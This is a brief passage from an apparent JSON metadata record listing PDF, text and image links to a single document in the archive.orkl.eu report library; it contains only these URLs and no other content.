"https://archive.orkl.eu/c131afc01f35015dc79100f2e44834862fca3a93.pdf", "text": "https://archive.orkl.eu/c131afc01f35015dc79100f2e44834862fca3a93.txt", "img": "https://archive.orkl.eu/c131afc01f35015dc79100f2e44834862fca3a93.jpg" } }